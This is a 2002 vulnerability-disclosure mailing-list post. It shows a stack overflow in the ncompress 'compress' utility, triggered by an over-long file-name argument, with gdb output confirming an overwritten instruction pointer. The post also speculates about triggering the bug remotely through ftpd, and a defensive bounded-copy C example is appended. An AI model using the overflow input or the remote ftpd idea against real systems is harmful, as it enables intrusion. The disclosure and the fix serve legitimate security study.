Vulnerability Development
mailing list archives
compress(vul) + ftpd(?)
From: HypH <hyphen () go2 pl>
Date: Tue, 5 Mar 2002 14:43:06 +0100
[hyph () port ~]$ rpm -qf `which compress`
ncompress-4.2.4-21
[hyph () port ~]$ compress `perl -e 'print "A" x 1100'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File
name too long
Segmentation fault (core dumped)
[hyph () port ~]$gdb compress core
[...]
#0 0x41414141 in ?? ()
(gdb) i r
eax 0x461 1121
ecx 0x1 1
edx 0x40158be0 1075153888
ebx 0x41414141 1094795585
esp 0xbffff368 0xbffff368
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141 <--- :-))
[...]
[hyph () port ~]$ cat /etc/redhat-release
Red Hat Linux release 7.1 (Seawolf)
[hyph () port ~]$ ls -l `which compress`
-rwxr-xr-x 2 root root 16156 gru 12 2000 /usr/bin/compress
Compress isn't suid so it gives us no benefit. And here's my question:
Is there any way to force the ftpd to 'compress' a file before sending it,
from the client's side? I'm asking for this particular daemon because of
this:
[hyph () port ~]$ ls -l /var/ftp/bin/
razem 400k
-r-------- 1 root root 313 sie 2 2001 bin.md5
-rwxr-xr-x 2 root root 16k gru 12 2000 compress <-- :-))
-rw------- 1 root root 848k mar 3 10:07 core
-rwxr-xr-x 2 root root 48k sie 8 2000 cpio
-rwxr-xr-x 4 root root 49k lut 8 2001 gzip
-rwxrwx--x 2 root root 45k mar 14 2001 ls
-rwxr-xr-x 2 root root 147k mar 6 2001 tar
The benefits would be obvious.
Sorry if it's a known bug/vulnerability (but I've never heard 'bout it before)
--
:::::::::::::::::::::::::::
Linux isn't unfriendly
he's only picky in choosing
his friends.
:::::::::::::::::::::::::::
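
Added example, not part of the original post and not ncompress's own code: a bounded way to build an output file name from a command-line argument, rejecting over-long names instead of copying them. It assumes the crash above comes from an unbounded copy of the file-name argument into a fixed-size stack buffer (the post does not show the source); NAME_BUF, build_output_name and the ".Z" suffix handling are hypothetical names chosen for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 1024  /* assumed size of the fixed name buffer */

/*
 * Unsafe pattern this replaces (assumed, for illustration):
 *     char ofname[NAME_BUF];
 *     strcpy(ofname, arg);      // no length check on argv data
 *     strcat(ofname, ".Z");
 */

/* Build "<arg><suffix>" in out. Returns 0 on success; on failure returns -1,
 * sets errno and leaves out as an empty string. Never writes past outsz. */
int build_output_name(char *out, size_t outsz, const char *arg, const char *suffix)
{
    size_t alen, slen;

    if (out == NULL || outsz == 0 || arg == NULL || suffix == NULL) {
        errno = EINVAL;
        return -1;
    }
    out[0] = '\0';
    alen = strlen(arg);
    slen = strlen(suffix);
    /* Need alen + slen + 1 <= outsz, written so the sum cannot wrap. */
    if (alen >= outsz || slen >= outsz - alen) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(out, arg, alen);
    memcpy(out + alen, suffix, slen + 1);  /* copies the terminating NUL */
    return 0;
}

int main(void)
{
    char name[1101], out[NAME_BUF];

    memset(name, 'A', 1100);   /* constructed input: same length as in the post */
    name[1100] = '\0';
    if (build_output_name(out, sizeof out, name, ".Z") != 0) {
        perror("compress-demo");  /* refuse the name and stop handling it */
        return 1;
    }
    printf("%s\n", out);
    return 0;
}
```

With the 1100-byte name the function fails with ENAMETOOLONG and the program exits cleanly, rather than reporting the error and then continuing to use the oversized name.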